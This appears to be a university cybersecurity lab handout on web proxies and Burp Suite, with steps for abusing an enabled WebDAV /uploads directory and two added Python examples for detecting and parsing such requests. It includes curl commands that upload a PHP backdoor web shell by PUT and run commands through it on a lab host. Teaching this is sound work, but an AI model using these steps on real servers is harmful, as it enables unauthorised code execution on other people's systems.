[CyberSec'24] Lab03 - Student Version

web pen-test labs

Uploaded by

youssefelkiki

CYBER SECURITY

LAB 03: Web Proxies (Burp Suite)


Agenda
● Using dirb to identify hidden directories
● Interacting with uploads directory with Curl
● What Are Web Proxies?
● Web Proxy vs Web Proxy Server
● Introduction To Burp Suite
● Interacting with the web app with Burp Suite
● Hands-On
HTTP Methods Recap
● GET: Used for retrieving data from the server. It should not have any side effects on the server or the application. (Nothing much to expect from it.)
● POST: Used for submitting data to the server, often for actions that
modify data on the server, like submitting a form. (Like Login Form)
● PUT: Used for updating a resource (file) on the server with a new
representation. It should be idempotent, meaning multiple requests
should have the same effect as a single request.
● DELETE: Used for removing a resource from the server.
● OPTIONS: Used to query the server about the communication
options and requirements for a specific resource, such as a URL or
endpoint.
Live Lab: HTTP Method Enumeration
Using dirb to identify hidden directories
● Dirb is a lightweight, command-line tool for scanning for hidden folders/directories and files that may not be displayed on the front-end of the web application.
● Command: dirb http://192.X.Y.3
● The directories which are present on the server are css, img, js, mail, uploads and vendor.
Interacting with uploads directory with Curl
● Step 1: Checking the content of the /uploads directory.
● Step 2: Sending an OPTIONS request to the /uploads directory.
● Command: curl -v -X OPTIONS 192.X.Y.3/uploads/
● The WebDAV module is enabled on the Apache server.
● The WebDAV module allows file upload via the PUT method.
● Step 3: Uploading a file with the PUT method.
● Command: curl http://192.X.Y.3/uploads/ --upload-file /usr/share/webshells/php/simple-backdoor.php
● Step 4: Checking the content of the /uploads directory.
● Step 5: Try to run commands on the web server.
● URL: http://192.X.Y.3/uploads/simple-backdoor.php?cmd=whoami
● Step 6: Using the DELETE method to delete the file.
● Command: curl -v -X DELETE 192.X.Y.3/uploads/simple-backdoor.php
● Step 7: Checking the content of the /uploads directory.
● The file was deleted successfully.
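The sequence above (OPTIONS probe, PUT of a script, GET of that script with a cmd parameter, DELETE) leaves a distinctive trail in the web server's access log. As an added example that is not part of the lab slides, here is a small Python detector run over constructed Apache combined-format log lines; the IPs, timestamps and severity labels are made up for illustration.

```python
import re

# Constructed Apache "combined" access-log lines mirroring the lab's steps
# (sample data for this example, not a real server log).
SAMPLE_LOG = """\
10.0.0.5 - - [10/Mar/2024:14:01:02 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.5 - - [10/Mar/2024:14:01:09 +0000] "OPTIONS /uploads/ HTTP/1.1" 200 0 "-" "curl/8.5.0"
10.0.0.5 - - [10/Mar/2024:14:01:15 +0000] "PUT /uploads/simple-backdoor.php HTTP/1.1" 201 0 "-" "curl/8.5.0"
10.0.0.5 - - [10/Mar/2024:14:01:21 +0000] "GET /uploads/simple-backdoor.php?cmd=whoami HTTP/1.1" 200 45 "-" "curl/8.5.0"
10.0.0.5 - - [10/Mar/2024:14:01:30 +0000] "DELETE /uploads/simple-backdoor.php HTTP/1.1" 204 0 "-" "curl/8.5.0"
10.0.0.9 - - [10/Mar/2024:14:02:00 +0000] "PUT /uploads/hello.txt HTTP/1.1" 201 0 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) \S+'
)
# WebDAV / write methods that a read-only web root should never accept.
WRITE_METHODS = {"PUT", "DELETE", "MOVE", "COPY", "MKCOL", "PROPPATCH"}
SCRIPT_EXT = (".php", ".phtml", ".php5", ".jsp", ".asp", ".aspx")

def parse_line(line):
    """Return a dict with ip, ts, method, path, query, status; None if unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["status"] = int(entry["status"])
    entry["path"], _, entry["query"] = entry["target"].partition("?")
    return entry

def detect_webdav_abuse(log_text):
    """Return (ip, severity, message) alerts for the OPTIONS -> PUT -> GET -> DELETE pattern."""
    alerts = []
    uploaded = set()  # (ip, path) pairs written by a successful PUT so far
    for raw in log_text.splitlines():
        e = parse_line(raw)
        if e is None:
            continue
        ip, method, path, status = e["ip"], e["method"], e["path"], e["status"]
        is_script = path.lower().endswith(SCRIPT_EXT)
        if method == "OPTIONS" and path.endswith("/"):
            alerts.append((ip, "low", f"OPTIONS probe of {path}"))  # method enumeration
        if method in WRITE_METHODS:
            ok = 200 <= status < 300
            sev = "high" if (method == "PUT" and is_script and ok) else "medium"
            alerts.append((ip, sev, f"{method} {path} -> {status}"))
            if method == "PUT" and ok:
                uploaded.add((ip, path))
        if method == "GET" and is_script and (ip, path) in uploaded:
            alerts.append((ip, "critical", f"request to uploaded script {path}?{e['query']}"))
    return alerts
```

Feeding a real access log through detect_webdav_abuse() and alerting on any "high" or "critical" entry is enough to catch the lab's whole workflow; the "medium" PUT of hello.txt shows that even a harmless write to /uploads is worth a look.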
Introduction to Web Proxies
What Are Web Proxies?
● A web proxy/interception proxy is a tool that is used to capture, analyze and
modify requests and responses exchanged between an HTTP client and a server.
● By intercepting HTTP/HTTPS requests and responses, we can analyze and study
the behavior and functionality of a web application.
● Proxies are a fundamental component of web application penetration tests and
will become one of your most trusted allies when assessing and testing web apps.
● The most popular and widely utilized web proxies
used today are:
o Burp Suite
o OWASP ZAP
Web Proxy vs Web Proxy Server
● It is important to distinguish between web proxies and proxy servers.
● A web proxy is used to intercept, analyze or modify HTTP/HTTPS requests sent between a client and server, and runs on the client side (Burp Suite or OWASP ZAP).
● A web proxy server is used to proxy internet traffic, filter specific traffic and optimize bandwidth (Cloudflare).
● The next two illustrations will clarify this distinction.
Web Proxy Illustrated
● In this case, the web proxy is an application that intercepts traffic sent and received by the
browser.
Web Proxy Server Illustrated
● In this case, the web proxy server filters all the traffic coming to and from the client.
Why use Web Proxies?
● We will utilize web proxies to intercept, analyze and modify HTTP requests exchanged
between a client and server prior to the traffic being sent to the web server. (Man In the
Middle)
● Web proxies typically work by intercepting the traffic being sent by the client browser; this is achieved by configuring the browser to send all traffic through your web proxy of choice.
● The primary objective for intercepting requests and responses is to:
o Analyze the behavior and functionality of web applications.
o Map out the structure of the web application (sitemap, uploads folder, admin panel, etc).
o Identify vulnerabilities and misconfigurations in web applications.
o Assess and attack web applications.
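A proxy can only modify what it can parse. As an added example (not from the lab slides or from PortSwigger's code), the following Python sketches the raw HTTP/1.1 request format Burp displays and the two edits the Repeater steps later make: swapping the method and changing the body while keeping Content-Length consistent. The sample request and its host are constructed.

```python
# Added example: a minimal parser/re-serializer for the raw HTTP/1.1 request text
# an interception proxy shows you; the sample request below is constructed, not captured.
class HttpRequest:
    def __init__(self, method, target, version, headers, body):
        self.method, self.target, self.version = method, target, version
        self.headers = headers  # list of (name, value) pairs, order preserved
        self.body = body        # bytes, exactly Content-Length long

    @classmethod
    def parse(cls, raw: bytes) -> "HttpRequest":
        head, sep, body = raw.partition(b"\r\n\r\n")
        if not sep:
            raise ValueError("incomplete request: no blank line after headers")
        lines = head.split(b"\r\n")
        method, target, version = lines[0].decode("ascii").split(" ", 2)
        headers = []
        for line in lines[1:]:
            name, _, value = line.decode("latin-1").partition(":")
            headers.append((name.strip(), value.strip()))
        length = int(dict((k.lower(), v) for k, v in headers).get("content-length", 0))
        return cls(method, target, version, headers, body[:length])

    def header(self, name):
        """Case-insensitive header lookup; None if absent."""
        return next((v for k, v in self.headers if k.lower() == name.lower()), None)

    def with_method(self, method):
        """Same request with another method, e.g. GET -> HEAD -> OPTIONS as in Repeater."""
        return HttpRequest(method, self.target, self.version, list(self.headers), self.body)

    def with_body(self, body: bytes):
        """Replace the body and fix Content-Length so the server reads it correctly."""
        headers = [(k, v) for k, v in self.headers if k.lower() != "content-length"]
        headers.append(("Content-Length", str(len(body))))
        return HttpRequest(self.method, self.target, self.version, headers, body)

    def serialize(self) -> bytes:
        start = f"{self.method} {self.target} {self.version}\r\n".encode("ascii")
        hdrs = "".join(f"{k}: {v}\r\n" for k, v in self.headers).encode("latin-1")
        return start + hdrs + b"\r\n" + self.body

SAMPLE_REQUEST = (  # constructed: a failed login POST, as the Repeater tab would show it
    b"POST /login.php HTTP/1.1\r\n"
    b"Host: 192.X.Y.3\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: 33\r\n"
    b"\r\n"
    b"username=wampp&password=wrongpass"
)
```

Forgetting to update Content-Length after editing a body is the classic hand-crafting mistake; the server either truncates the body or waits for bytes that never arrive, which is exactly why Repeater updates it for you.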
Introduction to Burp Suite
Introduction To Burp Suite
● Burp Suite is an industry standard web proxy written in Java and developed by
PortSwigger.
● It is used by penetration testers, developers and security researchers to analyze, map and
assess the security of web applications.
● Burp Suite offers a plethora of features and functionality like:
o The ability to intercept requests and responses between your browser and the web server/web
application.
o Modify/craft requests manually.
o Crawl web applications automatically.
o Fuzz web applications by sending patterns of valid and invalid inputs to test their behavior.
Burp Suite Editions
● Burp Suite has two editions:
● Community Edition - Provides you with everything you need to get started and is designed
for students or professionals looking to learn more about Cyber Security. Features include:
o HTTP(s) Proxy.
o Modules - Repeater, Decoder, Sequencer & Comparer.
o Lite version of the Intruder module (Performance Throttling).
● Professional Edition - Faster, more reliable offering designed for penetration testers and
security professionals. Features include everything in the community edition plus:
o Project files.
o No performance throttling.
o Intruder - Fully featured module.
o Custom PortSwigger payloads.
o Automatic scanner and crawler.
Installing Burp Suite (Windows)

https://portswigger.net/burp/releases/community/latest
Interacting with the web app with Burp Suite
● Step 1: Set FoxyProxy to use the Burp proxy.
Click on the Fox icon and select “Burp Suite”.
● Step 2: Start Burp Suite. Reload the page and the request will be intercepted.
● Step 3: Sending the request to Repeater.
● Step 3: Repeater tab:
● Step 4: Sending a GET request.
● Step 5: Sending a HEAD request.
● Step 6: Sending an OPTIONS request.
● Step 7: Sending a POST request.
● The POST method is not allowed.
● Step 8: Sending a POST request to login.php with incorrect login credentials.
● A 200 OK response is received.
● Step 9: Sending a POST request with valid login credentials.
● The login credentials were correct and, as a result, a 302 Found response redirecting to index.php was received.
● Step 10: Uploading a file with the PUT method.
● The file was uploaded successfully.
● Checking the files in the /uploads directory.
● The file "hello.txt" was uploaded successfully.
● Checking the content of the uploaded file.
● Step 11: Deleting the file.
● The file was deleted successfully.
● Checking the files in the /uploads directory.
● The file "hello.txt" was not found anymore.
Hands-On: WebDAV Exploitation via Burp Suite
(is.gd/lab3a)
● Find the hidden directory on the website. (Use the dirb tool.)
● Login with Username: wampp and Password: xampp.
● Upload a hello.txt file which contains “Hello World” using the PUT method. (Can you create it?)
● Check the file in the directory. (Did you find it?)
● Check the content of the uploaded file using the GET method. (Where is the file content now?)
● Delete the file from the /uploads directory using the DELETE method. (Does it exist anymore?)
Before Next Lab
● Create an account on PortSwigger Web Security Academy.
● Next Labs Hands-On will be conducted using this platform.

https://portswigger.net/users/register
QUESTIONS?
THANK YOU
